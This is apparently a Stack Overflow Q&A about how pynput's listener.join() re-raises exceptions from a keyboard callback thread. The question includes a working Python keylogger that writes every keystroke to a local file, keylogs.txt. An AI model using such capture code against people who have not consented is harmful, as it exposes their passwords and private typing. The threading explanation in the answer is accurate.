# What does it mean to be notified about "callback errors" by using listener.join() in pynput?

Tags: python, multithreading, exception, pynput

This is a Keylogger and in KeyInput function there is `listener.join()` but what is that for?

```
from pynput import keyboard

def KeyInput():
    with keyboard.Listener(on_press=KeyLog) as listener:
        # whenever there is a press on a key on the keyboard, it's directed to KeyLog 
        listener.join()

def KeyLog(key):
    if type(key) == keyboard._win32.KeyCode:
        K = key.char
        # normal characters like letters
    else:
        if 'cmd' in str(key):
            K = str(key).replace('cmd', 'Windows')
        else:
            K = ' '+str(key)+' '
        # keys like ctrl, caps lock, windows, etc
    with open('keylogs.txt', 'a') as File:
        File.write(K+'\n')
        File.close()

KeyInput()
KeyLog()
```

The [documentation](https://pynput.readthedocs.io/en/latest/keyboard.html#handling-keyboard-listener-errors) of pynput says:

> If a callback handler raises an exception, the listener will be stopped. Since callbacks run in a dedicated thread, the exceptions will not automatically be reraised.
>
> To be notified about callback errors, call `Thread.join` on the listener instance.

What does it mean by "callback error"?

Comment: Maybe you should read about [`Thread.join`](https://stackoverflow.com/questions/15085348/what-is-the-use-of-join-in-python-threading#15086113) first. The `listener.join()` is just an frequently-used pattern. More important is the callback defined as `on_press=Keylog`: call this function, when key is pressed.

Comment: thanks, from what i get, callback is related to ```on_press=Keylog``` and when that thing raises an exception, ```listener.join()``` stops the exception

Answer (score 0, accepted):

*"callback"* refers to the `KeyLog` function being passed as `on_press` argument to `keyboard.Listener`.

The listener is a separate thread which calls `KeyLog` whenever there is a key press event.

If `KeyLog` raises an exception (e.g. if the "keylogs.txt" file can't be opened), this is a *"callback error"*; an error in the callback function. But it happens in the listener thread, and the main thread (where `KeyInput` is called) has no possibility to handle the exception (for example to display a message to the user that the file can't be opened).

In order to be able to handle the exception in the main thread, it must be propagated from the listener thread. This is what `listener.join` does (which is the [`join`](https://docs.python.org/3/library/threading.html#threading.Thread.join) method of the `Thread` class, since `Listener` is a subclass):

If there was an exception in the `KeyLog` function, it will be raised by `listener.join()` again, so that it can be handled in the main thread.